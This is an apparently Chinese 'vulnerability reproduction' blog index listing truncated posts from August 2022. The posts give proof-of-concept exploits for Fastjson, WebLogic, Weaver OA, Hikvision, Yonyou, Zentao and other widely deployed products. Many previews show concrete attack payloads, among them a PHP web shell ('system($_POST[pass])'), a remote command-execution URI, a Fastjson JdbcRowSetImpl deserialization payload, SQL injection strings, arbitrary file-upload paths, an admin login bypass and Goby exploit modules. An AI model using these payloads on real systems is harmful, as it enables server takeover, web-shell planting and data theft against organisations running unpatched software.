漏洞复现-Linux实验室

Logo

  • 发布于:2022-08-06

    1

    FastJson代码执行漏洞(CVE-2...
    漏洞描述 Fastjson 是阿里巴巴的开源 JSON 解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON字符串,也可以从 JSON 字符串反序列化到 JavaBean。在 Fastjson 1.2.80 及以下版本中存在反序列化漏洞,攻击者可以在特定依赖下利用此漏洞绕过默认autoType 关闭限制,从而反序列化有安全风险的类。    ...
    阅读 128 评论 0
  • 发布于:2022-08-05

    1

    GravCMS 未经身份验证的任意 YA...
    Grav 是一个快速、简单、灵活的基于文件的 Web 平台。需要零安装。只需解压缩 ZIP 存档,您就已经启动并运行了。 当然,这又是一次给我们0day打猎的机会。您将阅读我们在研究过程中遇到的步骤。     绕过管理员页面保护 我知道我们不会找到任何唾手可得的果实。我不能透露我们客户的名字,但我可以坦率地说,他们拥有一支非常有才华、年轻且积极进取的安全团队。 当我们确...
    阅读 68 评论 0
  • 发布于:2022-08-05

    1

    Roxy-WI 未经身份验证的远程代码执...
    漏洞分析 漏洞 #1 – 身份验证绕过 从 Roxy GitHub帐户获得 Roxy-WI 源代码后,我完成了应用程序安装并开始检查应用程序。我访问了登录页面来分析安装后的应用程序。在访问登录页面时,我观察到应用程序请求了/app/options.py路径。如果无需身份验证即可访问应用程序中的资源,这是开始分析源代码的好时机。因此,我开始对/app/options.py文件进行攻击性源...
    阅读 84 评论 0
  • 发布于:2022-08-05

    1

    TRS-MAS 测试文件 testCom...
    TRS-MAS 测试文件 testCommandExecutor.jsp 远程命令执行 package exploits import (   "git.gobies.org/goby/goscanner/goutils" ) func init() {   expJson := `{   "Name&...
    阅读 83 评论 0
  • 发布于:2022-08-05

    1

    TRS-WAS远程命令执行
    poc "uri": "/mas/sysinfo/testCommandExecutor.jsp?cmdLine={{{cmdLine}}}&workDir=&pathEnv=&libPathEnv=",
    阅读 82 评论 0
  • 发布于:2022-08-05

    1

    WebLogic 反序列化远程命令执行路...
    poc /_async/AsyncResponseService
    阅读 82 评论 0
  • 发布于:2022-08-05

    1

    华天动力OA任意文件上传漏洞
    华天电力协同办公系统结合了先进的管理理念、管理模式、软件技术和网络技术,为用户提供了一个低成本、高效的协同办公和管理平台。睿智的管理者通过使用华天电力协同办公平台,在加强标准化工作流程、加强团队执行力、促进精细化管理和促进业务增长方面取得了良好的效果<br></p><p>华天电力OA中存在任意文件上传漏洞。攻击者可以上传任意文件、获取webshell、控制服务器...
    阅读 187 评论 0
  • 发布于:2022-08-05

    1

    安恒明御网关注入漏洞
    poc /webui/?g=aaa_portal_auth_config_reset&type=1
    阅读 134 评论 0
  • 发布于:2022-08-05

    1

    帆软1day
    poc /webroot/decision/view/form?op=chartlink&cmd=refresh_relate_data
    阅读 116 评论 0
  • 发布于:2022-08-05

    1

    泛微 EOffice10 前台 GETS...
    泛微 eoffice10 前台 getshell(eoffice10/version.json): 版本号:http://XXXXXXX:8010/eoffice10/version.json <form method='post' action='http://XXXXXXXX:8010/eoffice10/server/public/iWebOffice2015...
    阅读 84 评论 0
  • 发布于:2022-08-05

    1

    泛微E-office do_excel....
    泛微E-office do_excel.php任意文件写入漏洞 URL /WWW/general/charge/charge_list/do_excel.php Payload html=<?php system($_POST[pass]);?>
    阅读 111 评论 0
  • 发布于:2022-08-05

    1

    泛微OA uploaderOperate...
    漏洞详情 /workrelate/plan/util/uploaderOperate.jsp 存在文件上传漏洞     漏洞复现 POST /workrelate/plan/util/uploaderOperate.jsp HTTP/1.1 Host: X.X.X.X Sec-Ch-Ua: " Not A;Brand";v="99",...
    阅读 223 评论 0
  • 发布于:2022-08-05

    1

    泛微OA-0day管理员任意登录
    泛微OA-0day管理员任意登录 URL /mobile/plugin/VerifyQuickLogin.jsp Payload identifier=1&language=1&ipaddress=
    阅读 209 评论 0
  • 发布于:2022-08-05

    1

    海康威视综合运营管理平台RCE漏洞
    海康威视综合运营管理平台RCE漏洞 URL /bic/ssoService/v1/applyCT   Payload {"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b&q...
    阅读 130 评论 0
  • 发布于:2022-08-05

    1

    用友FE协作办公平台目录遍历
    用友FE协作办公平台 templateOfTaohong_manager.jsp目录遍历 /system/mediafile/templateofTaoHong_manager.jsp?path={{{path}}}
    阅读 40 评论 0
  • 发布于:2022-08-05

    1

    用友GRP-U8财务管理软件任意文件上传
    用友GRP-U8财务管理软件任意文件上传 /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=181=1&1=1&1=1&1=1&1=1&...
    阅读 76 评论 0
  • 发布于:2022-08-05

    1

    用友时空KSOA软件前台文件上传漏洞
    用友时空KSOA软件前台文件上传漏洞 /servlet/com.sksoft.bill.ImageUpload?filepath=/&filename=gmtxj.jsp
    阅读 74 评论 0
  • 发布于:2022-08-05

    1

    禅道 v16.5 SQL注入漏洞
    poc POST /zentao/user-login.html HTTP/1.1 Host: 127.0.0.1 Content-Type: application/x-www-form-urlencoded account=admin%27+and++updatexml%281%2Cconcat%280x1%2Cuser%28%29%29%2C1%29+and+%271%27%3D%27...
    阅读 58 评论 0
  • 发布于:2022-08-05

    1

    红帆医疗云OA医用版前台SQL注入漏洞
    poc /api/switch-value/list?sorts=%5B%7B%22Field%22:%22convert(int,stuff((select%20quotename(name)%20from%20sys.databases%20for%20xml%20path(%27%27),1,0,%27%27))%22%7D%5D&conditions=%5B%5D&_Z...
    阅读 72 评论 0
  • 发布于:2022-08-05

    1

    绿盟下一代防火墙 resourse.ph...
    package exploits import (   "fmt"   "git.gobies.org/goby/goscanner/goutils"   "git.gobies.org/goby/goscanner/jsonvul"   "gi...
    阅读 79 评论 0